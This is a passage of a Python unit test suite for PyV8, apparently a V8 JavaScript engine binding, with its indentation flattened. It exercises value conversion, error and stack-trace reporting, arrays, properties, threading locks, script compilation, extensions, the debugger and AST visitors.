self.assertEqual(float, type(ctxt.eval("3.14")))
self.assertEqual(datetime, type(ctxt.eval("new Date()")))
self.assertEqual(JSArray, type(ctxt.eval("[1, 2, 3]")))
self.assertEqual(JSFunction, type(ctxt.eval("(function() {})")))
self.assertEqual(JSObject, type(ctxt.eval("new Object()")))
def testPythonWrapper(self):
with JSContext() as ctxt:
typeof = ctxt.eval("(function type(value) { return typeof value; })")
protoof = ctxt.eval("(function protoof(value) { return Object.prototype.toString.apply(value); })")
self.assertEqual('[object Null]', protoof(None))
self.assertEqual('boolean', typeof(True))
self.assertEqual('number', typeof(123))
self.assertEqual('number', typeof(3.14))
self.assertEqual('string', typeof('test'))
self.assertEqual('string', typeof('test'))
self.assertEqual('[object Date]', protoof(datetime.now()))
self.assertEqual('[object Date]', protoof(date.today()))
self.assertEqual('[object Date]', protoof(time()))
def test():
pass
self.assertEqual('[object Function]', protoof(abs))
self.assertEqual('[object Function]', protoof(test))
self.assertEqual('[object Function]', protoof(self.testPythonWrapper))
self.assertEqual('[object Function]', protoof(int))
def testFunction(self):
with JSContext() as ctxt:
func = ctxt.eval("""
(function ()
{
function a()
{
return "abc";
}
return a();
})
""")
self.assertEqual("abc", str(func()))
self.assertTrue(func != None)
self.assertFalse(func == None)
func = ctxt.eval("(function test() {})")
self.assertEqual("test", func.name)
self.assertEqual("", func.resname)
self.assertEqual(0, func.linenum)
self.assertEqual(14, func.colnum)
self.assertEqual(0, func.lineoff)
self.assertEqual(0, func.coloff)
            # TODO: fix me, why doesn't the setter work?
# func.name = "hello"
# it seems __setattr__ was called instead of CJavascriptFunction::SetName
func.setName("hello")
self.assertEqual("hello", func.name)
def testCall(self):
class Hello(object):
def __call__(self, name):
return "hello " + name
class Global(JSClass):
hello = Hello()
with JSContext(Global()) as ctxt:
self.assertEqual("hello flier", ctxt.eval("hello('flier')"))
def testJSFunction(self):
with JSContext() as ctxt:
hello = ctxt.eval("(function (name) { return 'hello ' + name; })")
self.assertTrue(isinstance(hello, _PyV8.JSFunction))
self.assertEqual("hello flier", hello('flier'))
self.assertEqual("hello flier", hello.invoke(['flier']))
obj = ctxt.eval("({ 'name': 'flier', 'hello': function (name) { return 'hello ' + name + ' from ' + this.name; }})")
hello = obj.hello
self.assertTrue(isinstance(hello, JSFunction))
self.assertEqual("hello flier from flier", hello('flier'))
tester = ctxt.eval("({ 'name': 'tester' })")
self.assertEqual("hello flier from tester", hello.invoke(tester, ['flier']))
self.assertEqual("hello flier from json", hello.apply({ 'name': 'json' }, ['flier']))
def testConstructor(self):
with JSContext() as ctx:
ctx.eval("""
var Test = function() {
this.trySomething();
};
Test.prototype.trySomething = function() {
this.name = 'flier';
};
var Test2 = function(first_name, last_name) {
this.name = first_name + ' ' + last_name;
};
""")
self.assertTrue(isinstance(ctx.locals.Test, _PyV8.JSFunction))
test = JSObject.create(ctx.locals.Test)
self.assertTrue(isinstance(ctx.locals.Test, _PyV8.JSObject))
self.assertEqual("flier", test.name);
test2 = JSObject.create(ctx.locals.Test2, ('Flier', 'Lu'))
self.assertEqual("Flier Lu", test2.name);
test3 = JSObject.create(ctx.locals.Test2, ('Flier', 'Lu'), { 'email': 'flier.lu@gmail.com' })
self.assertEqual("flier.lu@gmail.com", test3.email);
def testJSError(self):
with JSContext() as ctxt:
try:
ctxt.eval('throw "test"')
self.fail()
except:
self.assertTrue(JSError, sys.exc_info()[0])
def testErrorInfo(self):
with JSContext() as ctxt:
with JSEngine() as engine:
try:
engine.compile("""
function hello()
{
throw Error("hello world");
}
hello();""", "test", 10, 10).run()
self.fail()
except JSError as e:
self.assertTrue(str(e).startswith('JSError: Error: hello world ( test @ 14 : 34 ) ->'))
self.assertEqual("Error", e.name)
self.assertEqual("hello world", e.message)
self.assertEqual("test", e.scriptName)
self.assertEqual(14, e.lineNum)
self.assertEqual(102, e.startPos)
self.assertEqual(103, e.endPos)
self.assertEqual(34, e.startCol)
self.assertEqual(35, e.endCol)
self.assertEqual('throw Error("hello world");', e.sourceLine.strip())
self.assertEqual('Error: hello world\n' +
' at Error (<anonymous>)\n' +
' at hello (test:14:35)\n' +
' at test:17:25', e.stackTrace)
def testParseStack(self):
self.assertEqual([
('Error', 'unknown source', None, None),
('test', 'native', None, None),
('<anonymous>', 'test0', 3, 5),
('f', 'test1', 2, 19),
('g', 'test2', 1, 15),
(None, 'test3', 1, None),
(None, 'test3', 1, 1),
], JSError.parse_stack("""Error: err
at Error (unknown source)
at test (native)
at new <anonymous> (test0:3:5)
at f (test1:2:19)
at g (test2:1:15)
at test3:1
at test3:1:1"""))
def testStackTrace(self):
class Global(JSClass):
def GetCurrentStackTrace(self, limit):
return JSStackTrace.GetCurrentStackTrace(4, JSStackTrace.Options.Detailed)
with JSContext(Global()) as ctxt:
st = ctxt.eval("""
function a()
{
return GetCurrentStackTrace(10);
}
function b()
{
return eval("a()");
}
function c()
{
return new b();
}
c();""", "test")
self.assertEqual(4, len(st))
self.assertEqual("\tat a (test:4:28)\n\tat (eval)\n\tat b (test:8:28)\n\tat c (test:12:28)\n", str(st))
self.assertEqual("test.a (4:28)\n. (1:1) eval\ntest.b (8:28) constructor\ntest.c (12:28)",
"\n".join(["%s.%s (%d:%d)%s%s" % (
f.scriptName, f.funcName, f.lineNum, f.column,
' eval' if f.isEval else '',
' constructor' if f.isConstructor else '') for f in st]))
def testPythonException(self):
class Global(JSClass):
def raiseException(self):
raise RuntimeError("Hello")
with JSContext(Global()) as ctxt:
r = ctxt.eval("""
msg ="";
try
{
this.raiseException()
}
catch(e)
{
msg += "catch " + e + ";";
}
finally
{
msg += "finally";
}""")
self.assertEqual("catch Error: Hello;finally", str(ctxt.locals.msg))
def testExceptionMapping(self):
class TestException(Exception):
pass
class Global(JSClass):
def raiseIndexError(self):
return [1, 2, 3][5]
def raiseAttributeError(self):
None.hello()
def raiseSyntaxError(self):
eval("???")
def raiseTypeError(self):
int(sys)
def raiseNotImplementedError(self):
raise NotImplementedError("Not support")
def raiseExceptions(self):
raise TestException()
with JSContext(Global()) as ctxt:
ctxt.eval("try { this.raiseIndexError(); } catch (e) { msg = e; }")
self.assertEqual("RangeError: list index out of range", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseAttributeError(); } catch (e) { msg = e; }")
self.assertEqual("ReferenceError: 'NoneType' object has no attribute 'hello'", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseSyntaxError(); } catch (e) { msg = e; }")
self.assertEqual("SyntaxError: invalid syntax", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseTypeError(); } catch (e) { msg = e; }")
self.assertEqual("TypeError: int() argument must be a string or a number, not 'module'", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseNotImplementedError(); } catch (e) { msg = e; }")
self.assertEqual("Error: Not support", str(ctxt.locals.msg))
self.assertRaises(TestException, ctxt.eval, "this.raiseExceptions();")
def testArray(self):
with JSContext() as ctxt:
array = ctxt.eval("""
var array = new Array();
for (i=0; i<10; i++)
{
array[i] = 10-i;
}
array;
""")
self.assertTrue(isinstance(array, _PyV8.JSArray))
self.assertEqual(10, len(array))
self.assertTrue(5 in array)
self.assertFalse(15 in array)
self.assertEqual(10, len(array))
for i in range(10):
self.assertEqual(10-i, array[i])
array[5] = 0
self.assertEqual(0, array[5])
del array[5]
self.assertEqual(None, array[5])
# array [10, 9, 8, 7, 6, None, 4, 3, 2, 1]
# array[4:7] 4^^^^^^^^^7
# array[-3:-1] -3^^^^^^-1
# array[0:0] []
self.assertEqual([6, None, 4], array[4:7])
self.assertEqual([3, 2], array[-3:-1])
self.assertEqual([], array[0:0])
array[1:3] = [9, 9, 9]
self.assertEqual([10, 9, 9, 9, 7, 6, None, 4, 3, 2, 1], list(array))
array[5:8] = [8, 8]
self.assertEqual([10, 9, 9, 9, 7, 8, 8, 3, 2, 1], list(array))
del array[1:4]
self.assertEqual([10, 7, 8, 8, 3, 2, 1], list(array))
ctxt.locals.array1 = JSArray(5)
ctxt.locals.array2 = JSArray([1, 2, 3, 4, 5])
for i in range(len(ctxt.locals.array2)):
ctxt.locals.array1[i] = ctxt.locals.array2[i] * 10
ctxt.eval("""
var sum = 0;
for (i=0; i<array1.length; i++)
sum += array1[i]
for (i=0; i<array2.length; i++)
sum += array2[i]
""")
self.assertEqual(165, ctxt.locals.sum)
ctxt.locals.array3 = [1, 2, 3, 4, 5]
self.assertTrue(ctxt.eval('array3[1] === 2'))
self.assertTrue(ctxt.eval('array3[9] === undefined'))
args = [
["a = Array(7); for(i=0; i<a.length; i++) a[i] = i; a[3] = undefined; a[a.length-1]; a", "0,1,2,,4,5,6", [0, 1, 2, None, 4, 5, 6]],
["a = Array(7); for(i=0; i<a.length - 1; i++) a[i] = i; a[a.length-1]; a", "0,1,2,3,4,5,", [0, 1, 2, 3, 4, 5, None]],
["a = Array(7); for(i=1; i<a.length; i++) a[i] = i; a[a.length-1]; a", ",1,2,3,4,5,6", [None, 1, 2, 3, 4, 5, 6]]
]
for arg in args:
array = ctxt.eval(arg[0])
self.assertEqual(arg[1], str(array))
self.assertEqual(arg[2], [array[i] for i in range(len(array))])
self.assertEqual(3, ctxt.eval("(function (arr) { return arr.length; })")(JSArray([1, 2, 3])))
self.assertEqual(2, ctxt.eval("(function (arr, idx) { return arr[idx]; })")(JSArray([1, 2, 3]), 1))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray([1, 2, 3])))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray((1, 2, 3))))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray(list(range(3)))))
[x for x in JSArray([1,2,3])]
def testMultiDimArray(self):
with JSContext() as ctxt:
ret = ctxt.eval("""
({
'test': function(){
return [
[ 1, 'abla' ],
[ 2, 'ajkss' ],
]
}
})
""").test()
self.assertEqual([[1, 'abla'], [2, 'ajkss']], convert(ret))
def testLazyConstructor(self):
class Globals(JSClass):
def __init__(self):
self.array=JSArray([1,2,3])
with JSContext(Globals()) as ctxt:
self.assertEqual(2, ctxt.eval("""array[1]"""))
def testForEach(self):
class NamedClass(object):
foo = 1
def __init__(self):
self.bar = 2
@property
def foobar(self):
return self.foo + self.bar
def gen(x):
for i in range(x):
yield i
with JSContext() as ctxt:
func = ctxt.eval("""(function (k) {
var result = [];
for (var prop in k) {
result.push(prop);
}
return result;
})""")
self.assertTrue(set(["bar", "foo", "foobar"]).issubset(set(func(NamedClass()))))
self.assertEqual(["0", "1", "2"], list(func([1, 2, 3])))
self.assertEqual(["0", "1", "2"], list(func((1, 2, 3))))
self.assertEqual(["1", "2", "3"], list(func({1:1, 2:2, 3:3})))
self.assertEqual(["0", "1", "2"], list(func(gen(3))))
def testDict(self):
with JSContext() as ctxt:
obj = ctxt.eval("var r = { 'a' : 1, 'b' : 2 }; r")
self.assertEqual(1, obj.a)
self.assertEqual(2, obj.b)
self.assertEqual({ 'a' : 1, 'b' : 2 }, dict(obj))
self.assertEqual({ 'a': 1,
'b': [1, 2, 3],
'c': { 'str' : 'goofy',
'float' : 1.234,
'obj' : { 'name': 'john doe' }},
'd': True,
'e': None },
convert(ctxt.eval("""var x =
{ a: 1,
b: [1, 2, 3],
c: { str: 'goofy',
float: 1.234,
obj: { name: 'john doe' }},
d: true,
e: null }; x""")))
def testDate(self):
with JSContext() as ctxt:
now1 = ctxt.eval("new Date();")
self.assertTrue(now1)
now2 = datetime.utcnow()
delta = now2 - now1 if now2 > now1 else now1 - now2
self.assertTrue(delta < timedelta(seconds=1))
func = ctxt.eval("(function (d) { return d.toString(); })")
now = datetime.now()
self.assertTrue(str(func(now)).startswith(now.strftime("%a %b %d %Y %H:%M:%S")))
def testUnicode(self):
with JSContext() as ctxt:
self.assertEqual("人", toUnicodeString(ctxt.eval("\"人\"")))
self.assertEqual("é", toUnicodeString(ctxt.eval("\"é\"")))
func = ctxt.eval("(function (msg) { return msg.length; })")
self.assertEqual(2, func("测试"))
def testClassicStyleObject(self):
        class FileSystemWrapper:
@property
def cwd(self):
return os.getcwd()
class Global:
@property
def fs(self):
                return FileSystemWrapper()
with JSContext(Global()) as ctxt:
self.assertEqual(os.getcwd(), ctxt.eval("fs.cwd"))
def testRefCount(self):
count = sys.getrefcount(None)
class Global(JSClass):
pass
with JSContext(Global()) as ctxt:
ctxt.eval("""
var none = null;
""")
self.assertEqual(count+1, sys.getrefcount(None))
ctxt.eval("""
var none = null;
""")
self.assertEqual(count+1, sys.getrefcount(None))
def testProperty(self):
class Global(JSClass):
def __init__(self, name):
self._name = name
def getname(self):
return self._name
def setname(self, name):
self._name = name
def delname(self):
self._name = 'deleted'
name = property(getname, setname, delname)
g = Global('world')
with JSContext(g) as ctxt:
self.assertEqual('world', ctxt.eval("name"))
self.assertEqual('flier', ctxt.eval("this.name = 'flier';"))
self.assertEqual('flier', ctxt.eval("name"))
self.assertTrue(ctxt.eval("delete name"))
###
# FIXME replace the global object with Python object
#
#self.assertEqual('deleted', ctxt.eval("name"))
#ctxt.eval("__defineGetter__('name', function() { return 'fixed'; });")
#self.assertEqual('fixed', ctxt.eval("name"))
def testGetterAndSetter(self):
class Global(JSClass):
def __init__(self, testval):
self.testval = testval
with JSContext(Global("Test Value A")) as ctxt:
self.assertEqual("Test Value A", ctxt.locals.testval)
ctxt.eval("""
this.__defineGetter__("test", function() {
return this.testval;
});
this.__defineSetter__("test", function(val) {
this.testval = val;
});
""")
self.assertEqual("Test Value A", ctxt.locals.test)
ctxt.eval("test = 'Test Value B';")
self.assertEqual("Test Value B", ctxt.locals.test)
def testDestructor(self):
import gc
owner = self
owner.deleted = False
class Hello(object):
def say(self):
pass
def __del__(self):
owner.deleted = True
def test():
with JSContext() as ctxt:
fn = ctxt.eval("(function (obj) { obj.say(); })")
obj = Hello()
self.assertEqual(2, sys.getrefcount(obj))
fn(obj)
self.assertEqual(4, sys.getrefcount(obj))
del obj
test()
self.assertFalse(owner.deleted)
JSEngine.collect()
gc.collect()
self.assertTrue(owner.deleted)
def testNullInString(self):
with JSContext() as ctxt:
fn = ctxt.eval("(function (s) { return s; })")
self.assertEqual("hello \0 world", fn("hello \0 world"))
def testLivingObjectCache(self):
class Global(JSClass):
i = 1
b = True
o = object()
with JSContext(Global()) as ctxt:
self.assertTrue(ctxt.eval("i == i"))
self.assertTrue(ctxt.eval("b == b"))
self.assertTrue(ctxt.eval("o == o"))
def testNamedSetter(self):
class Obj(JSClass):
@property
def p(self):
return self._p
@p.setter
def p(self, value):
self._p = value
class Global(JSClass):
def __init__(self):
self.obj = Obj()
self.d = {}
self.p = None
with JSContext(Global()) as ctxt:
ctxt.eval("""
x = obj;
x.y = 10;
x.p = 10;
d.y = 10;
""")
self.assertEqual(10, ctxt.eval("obj.y"))
self.assertEqual(10, ctxt.eval("obj.p"))
self.assertEqual(10, ctxt.locals.d['y'])
def testWatch(self):
class Obj(JSClass):
def __init__(self):
self.p = 1
class Global(JSClass):
def __init__(self):
self.o = Obj()
with JSContext(Global()) as ctxt:
ctxt.eval("""
o.watch("p", function (id, oldval, newval) {
return oldval + newval;
});
""")
self.assertEqual(1, ctxt.eval("o.p"))
ctxt.eval("o.p = 2;")
self.assertEqual(3, ctxt.eval("o.p"))
ctxt.eval("delete o.p;")
self.assertEqual(None, ctxt.eval("o.p"))
ctxt.eval("o.p = 2;")
self.assertEqual(2, ctxt.eval("o.p"))
ctxt.eval("o.unwatch('p');")
ctxt.eval("o.p = 1;")
self.assertEqual(1, ctxt.eval("o.p"))
def testReferenceError(self):
class Global(JSClass):
def __init__(self):
self.s = self
with JSContext(Global()) as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, 'x')
self.assertTrue(ctxt.eval("typeof(x) === 'undefined'"))
self.assertTrue(ctxt.eval("typeof(String) === 'function'"))
self.assertTrue(ctxt.eval("typeof(s.String) === 'undefined'"))
self.assertTrue(ctxt.eval("typeof(s.z) === 'undefined'"))
def testRaiseExceptionInGetter(self):
class Document(JSClass):
def __getattr__(self, name):
if name == 'y':
raise TypeError()
return JSClass.__getattr__(self, name)
class Global(JSClass):
def __init__(self):
self.document = Document()
with JSContext(Global()) as ctxt:
self.assertEqual(None, ctxt.eval('document.x'))
self.assertRaises(TypeError, ctxt.eval, 'document.y')
class TestMultithread(unittest.TestCase):
def testLocker(self):
self.assertFalse(JSLocker.active)
self.assertFalse(JSLocker.locked)
with JSLocker() as outter_locker:
self.assertTrue(JSLocker.active)
self.assertTrue(JSLocker.locked)
self.assertTrue(outter_locker)
with JSLocker() as inner_locker:
self.assertTrue(JSLocker.locked)
self.assertTrue(outter_locker)
self.assertTrue(inner_locker)
with JSUnlocker() as unlocker:
self.assertFalse(JSLocker.locked)
self.assertTrue(outter_locker)
self.assertTrue(inner_locker)
self.assertTrue(JSLocker.locked)
self.assertTrue(JSLocker.active)
self.assertFalse(JSLocker.locked)
locker = JSLocker()
with JSContext():
self.assertRaises(RuntimeError, locker.__enter__)
self.assertRaises(RuntimeError, locker.__exit__, None, None, None)
del locker
def testMultiPythonThread(self):
import time, threading
class Global:
count = 0
started = threading.Event()
finished = threading.Semaphore(0)
def sleep(self, ms):
time.sleep(ms / 1000.0)
self.count += 1
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
started.wait();
for (i=0; i<10; i++)
{
sleep(100);
}
finished.release();
""")
threading.Thread(target=run).start()
now = time.time()
self.assertEqual(0, g.count)
g.started.set()
g.finished.acquire()
self.assertEqual(10, g.count)
self.assertTrue((time.time() - now) >= 1)
def testMultiJavascriptThread(self):
import time, threading
class Global:
result = []
def add(self, value):
with JSUnlocker():
time.sleep(0.1)
self.result.append(value)
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
for (i=0; i<10; i++)
add(i);
""")
threads = [threading.Thread(target=run), threading.Thread(target=run)]
with JSLocker():
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(20, len(g.result))
def _testPreemptionJavascriptThreads(self):
import time, threading
class Global:
result = []
def add(self, value):
                # we use the preemption scheduler to switch between threads,
                # so the JSUnlocker is just commented out here
#
# with JSUnlocker() as unlocker:
time.sleep(0.1)
self.result.append(value)
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
for (i=0; i<10; i++)
add(i);
""")
threads = [threading.Thread(target=run), threading.Thread(target=run)]
with JSLocker() as locker:
JSLocker.startPreemption(100)
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(20, len(g.result))
class TestEngine(unittest.TestCase):
def testClassProperties(self):
with JSContext() as ctxt:
self.assertTrue(str(JSEngine.version).startswith("3."))
self.assertFalse(JSEngine.dead)
def testCompile(self):
with JSContext() as ctxt:
with JSEngine() as engine:
s = engine.compile("1+2")
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual("1+2", s.source)
self.assertEqual(3, int(s.run()))
self.assertRaises(SyntaxError, engine.compile, "1+")
def testPrecompile(self):
with JSContext() as ctxt:
with JSEngine() as engine:
data = engine.precompile("1+2")
self.assertTrue(data)
self.assertEqual(28, len(data))
s = engine.compile("1+2", precompiled=data)
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual("1+2", s.source)
self.assertEqual(3, int(s.run()))
self.assertRaises(SyntaxError, engine.precompile, "1+")
def testUnicodeSource(self):
class Global(JSClass):
var = '测试'
def __getattr__(self, name):
if (name if is_py3k else name.decode('utf-8')) == '变量':
return self.var
return JSClass.__getattr__(self, name)
g = Global()
with JSContext(g) as ctxt:
with JSEngine() as engine:
src = """
function 函数() { return 变量.length; }
函数();
var func = function () {};
"""
data = engine.precompile(src)
self.assertTrue(data)
self.assertEqual(68, len(data))
s = engine.compile(src, precompiled=data)
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual(toNativeString(src), s.source)
self.assertEqual(2, s.run())
func_name = toNativeString('函数')
self.assertTrue(hasattr(ctxt.locals, func_name))
func = getattr(ctxt.locals, func_name)
self.assertTrue(isinstance(func, _PyV8.JSFunction))
self.assertEqual(func_name, func.name)
self.assertEqual("", func.resname)
self.assertEqual(1, func.linenum)
self.assertEqual(0, func.lineoff)
self.assertEqual(0, func.coloff)
var_name = toNativeString('变量')
setattr(ctxt.locals, var_name, '测试长字符串')
self.assertEqual(6, func())
self.assertEqual("func", ctxt.locals.func.inferredname)
def testExtension(self):
extSrc = """function hello(name) { return "hello " + name + " from javascript"; }"""
extJs = JSExtension("hello/javascript", extSrc)
self.assertTrue(extJs)
self.assertEqual("hello/javascript", extJs.name)
self.assertEqual(extSrc, extJs.source)
self.assertFalse(extJs.autoEnable)
self.assertTrue(extJs.registered)
TestEngine.extJs = extJs
with JSContext(extensions=['hello/javascript']) as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("hello('flier')"))
# test the auto enable property
with JSContext() as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, "hello('flier')")
extJs.autoEnable = True
self.assertTrue(extJs.autoEnable)
with JSContext() as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("hello('flier')"))
extJs.autoEnable = False
self.assertFalse(extJs.autoEnable)
with JSContext() as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, "hello('flier')")
extUnicodeSrc = """function helloW(name) { return "hello " + name + " from javascript"; }"""
extUnicodeJs = JSExtension("helloW/javascript", extUnicodeSrc)
self.assertTrue(extUnicodeJs)
self.assertEqual("helloW/javascript", extUnicodeJs.name)
self.assertEqual(toNativeString(extUnicodeSrc), extUnicodeJs.source)
self.assertFalse(extUnicodeJs.autoEnable)
self.assertTrue(extUnicodeJs.registered)
TestEngine.extUnicodeJs = extUnicodeJs
with JSContext(extensions=['helloW/javascript']) as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("helloW('flier')"))
ret = ctxt.eval("helloW('世界')")
self.assertEqual("hello 世界 from javascript", ret if is_py3k else ret.decode('UTF-8'))
def testNativeExtension(self):
extSrc = "native function hello();"
extPy = JSExtension("hello/python", extSrc, lambda func: lambda name: "hello " + name + " from python", register=False)
self.assertTrue(extPy)
self.assertEqual("hello/python", extPy.name)
self.assertEqual(extSrc, extPy.source)
self.assertFalse(extPy.autoEnable)
self.assertFalse(extPy.registered)
extPy.register()
self.assertTrue(extPy.registered)
TestEngine.extPy = extPy
with JSContext(extensions=['hello/python']) as ctxt:
self.assertEqual("hello flier from python", ctxt.eval("hello('flier')"))
def _testSerialize(self):
data = None
self.assertFalse(JSContext.entered)
with JSContext() as ctxt:
self.assertTrue(JSContext.entered)
#ctxt.eval("function hello(name) { return 'hello ' + name; }")
data = JSEngine.serialize()
self.assertTrue(data)
self.assertTrue(len(data) > 0)
self.assertFalse(JSContext.entered)
#JSEngine.deserialize()
self.assertTrue(JSContext.entered)
self.assertEqual('hello flier', JSContext.current.eval("hello('flier');"))
def testEval(self):
with JSContext() as ctxt:
self.assertEqual(3, int(ctxt.eval("1+2")))
def testGlobal(self):
class Global(JSClass):
version = "1.0"
with JSContext(Global()) as ctxt:
vars = ctxt.locals
# getter
self.assertEqual(Global.version, str(vars.version))
self.assertEqual(Global.version, str(ctxt.eval("version")))
self.assertRaises(ReferenceError, ctxt.eval, "nonexists")
# setter
self.assertEqual(2.0, float(ctxt.eval("version = 2.0")))
self.assertEqual(2.0, float(vars.version))
def testThis(self):
class Global(JSClass):
version = 1.0
with JSContext(Global()) as ctxt:
self.assertEqual("[object Global]", str(ctxt.eval("this")))
self.assertEqual(1.0, float(ctxt.eval("this.version")))
def testObjectBuildInMethods(self):
class Global(JSClass):
version = 1.0
with JSContext(Global()) as ctxt:
self.assertEqual("[object Global]", str(ctxt.eval("this.toString()")))
self.assertEqual("[object Global]", str(ctxt.eval("this.toLocaleString()")))
self.assertEqual(Global.version, float(ctxt.eval("this.valueOf()").version))
self.assertTrue(bool(ctxt.eval("this.hasOwnProperty(\"version\")")))
self.assertFalse(ctxt.eval("this.hasOwnProperty(\"nonexistent\")"))
def testPythonWrapper(self):
class Global(JSClass):
s = [1, 2, 3]
d = {'a': {'b': 'c'}, 'd': ['e', 'f']}
g = Global()
with JSContext(g) as ctxt:
ctxt.eval("""
s[2] = s[1] + 2;
s[0] = s[1];
delete s[1];
""")
self.assertEqual([2, 4], g.s)
self.assertEqual('c', ctxt.eval("d.a.b"))
self.assertEqual(['e', 'f'], ctxt.eval("d.d"))
ctxt.eval("""
d.a.q = 4
delete d.d
""")
self.assertEqual(4, g.d['a']['q'])
self.assertEqual(None, ctxt.eval("d.d"))
def _testMemoryAllocationCallback(self):
alloc = {}
def callback(space, action, size):
alloc[(space, action)] = alloc.setdefault((space, action), 0) + size
JSEngine.setMemoryAllocationCallback(callback)
with JSContext() as ctxt:
self.assertFalse((JSObjectSpace.Code, JSAllocationAction.alloc) in alloc)
ctxt.eval("var o = new Array(1000);")
self.assertTrue((JSObjectSpace.Code, JSAllocationAction.alloc) in alloc)
JSEngine.setMemoryAllocationCallback(None)
class TestDebug(unittest.TestCase):
def setUp(self):
self.engine = JSEngine()
def tearDown(self):
del self.engine
events = []
def processDebugEvent(self, event):
try:
logging.debug("receive debug event: %s", repr(event))
self.events.append(repr(event))
except:
logging.error("fail to process debug event")
logging.debug(traceback.extract_stack())
def testEventDispatch(self):
debugger = JSDebugger()
self.assertTrue(not debugger.enabled)
debugger.onBreak = lambda evt: self.processDebugEvent(evt)
debugger.onException = lambda evt: self.processDebugEvent(evt)
debugger.onNewFunction = lambda evt: self.processDebugEvent(evt)
debugger.onBeforeCompile = lambda evt: self.processDebugEvent(evt)
debugger.onAfterCompile = lambda evt: self.processDebugEvent(evt)
with JSContext() as ctxt:
debugger.enabled = True
self.assertEqual(3, int(ctxt.eval("function test() { text = \"1+2\"; return eval(text) } test()")))
debugger.enabled = False
self.assertRaises(JSError, JSContext.eval, ctxt, "throw 1")
self.assertTrue(not debugger.enabled)
self.assertEqual(4, len(self.events))
class TestProfile(unittest.TestCase):
def _testStart(self):
self.assertFalse(profiler.started)
profiler.start()
self.assertTrue(profiler.started)
profiler.stop()
self.assertFalse(profiler.started)
def _testResume(self):
self.assertTrue(profiler.paused)
self.assertEqual(profiler.Modules.cpu, profiler.modules)
profiler.resume()
profiler.resume(profiler.Modules.heap)
# TODO enable profiler with resume
#self.assertFalse(profiler.paused)
class TestAST(unittest.TestCase):
class Checker(object):
def __init__(self, testcase):
self.testcase = testcase
self.called = []
def __enter__(self):
self.ctxt = JSContext()
self.ctxt.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.ctxt.leave()
def __getattr__(self, name):
return getattr(self.testcase, name)
def test(self, script):
JSEngine().compile(script).visit(self)
return self.called
def onProgram(self, prog):
self.ast = prog.toAST()
self.json = json.loads(prog.toJSON())
for decl in prog.scope.declarations:
decl.visit(self)
for stmt in prog.body:
stmt.visit(self)
def onBlock(self, block):
for stmt in block.statements:
stmt.visit(self)
def onExpressionStatement(self, stmt):
stmt.expression.visit(self)
#print type(stmt.expression), stmt.expression
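# Each test below subclasses Checker, overrides only the on<NodeType> callbacks
# it cares about, and calls test(script): compile(script).visit(self) dispatches
# one callback per AST node, and self.called records the order of the visits.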
def testBlock(self):
class BlockChecker(TestAST.Checker):
def onBlock(self, stmt):
self.called.append('block')
self.assertEqual(AST.NodeType.Block, stmt.type)
self.assertTrue(stmt.initializerBlock)
self.assertFalse(stmt.anonymous)
target = stmt.breakTarget
self.assertTrue(target)
self.assertFalse(target.bound)
self.assertTrue(target.unused)
self.assertFalse(target.linked)
self.assertEqual(2, len(stmt.statements))
self.assertEqual(['%InitializeVarGlobal("i", 0);', '%InitializeVarGlobal("j", 0);'], [str(s) for s in stmt.statements])
with BlockChecker(self) as checker:
self.assertEqual(['block'], checker.test("var i, j;"))
self.assertEqual("""FUNC
. NAME ""
. INFERRED NAME ""
. DECLS
. . VAR "i"
. . VAR "j"
. BLOCK INIT
. . CALL RUNTIME InitializeVarGlobal
. . . LITERAL "i"
. . . LITERAL 0
. . CALL RUNTIME InitializeVarGlobal
. . . LITERAL "j"
. . . LITERAL 0
""", checker.ast)
self.assertEqual(['FunctionLiteral', {'name': ''},
['Declaration', {'mode': 'VAR'},
['Variable', {'name': 'i'}]
], ['Declaration', {'mode':'VAR'},
['Variable', {'name': 'j'}]
], ['Block',
['ExpressionStatement', ['CallRuntime', {'name': 'InitializeVarGlobal'},
['Literal', {'handle':'i'}],
['Literal', {'handle': 0}]]],
['ExpressionStatement', ['CallRuntime', {'name': 'InitializeVarGlobal'},
['Literal', {'handle': 'j'}],
['Literal', {'handle': 0}]]]
]
], checker.json)
def testIfStatement(self):
class IfStatementChecker(TestAST.Checker):
def onIfStatement(self, stmt):
self.called.append('if')
self.assertTrue(stmt)
self.assertEqual(AST.NodeType.IfStatement, stmt.type)
self.assertEqual(7, stmt.pos)
stmt.pos = 100
self.assertEqual(100, stmt.pos)
self.assertTrue(stmt.hasThenStatement)
self.assertTrue(stmt.hasElseStatement)
self.assertEqual("((value % 2) == 0)", str(stmt.condition))
self.assertEqual("{ s = \"even\"; }", str(stmt.thenStatement))
self.assertEqual("{ s = \"odd\"; }", str(stmt.elseStatement))
self.assertFalse(stmt.condition.isPropertyName)
with IfStatementChecker(self) as checker:
self.assertEqual(['if'], checker.test("var s; if (value % 2 == 0) { s = 'even'; } else { s = 'odd'; }"))
def testForStatement(self):
class ForStatementChecker(TestAST.Checker):
def onForStatement(self, stmt):
self.called.append('for')
self.assertEqual("{ j += i; }", str(stmt.body))
self.assertEqual("i = 0;", str(stmt.init))
self.assertEqual("(i < 10)", str(stmt.condition))
self.assertEqual("(i++);", str(stmt.nextStmt))
target = stmt.continueTarget
self.assertTrue(target)
self.assertFalse(target.bound)
self.assertTrue(target.unused)
self.assertFalse(target.linked)
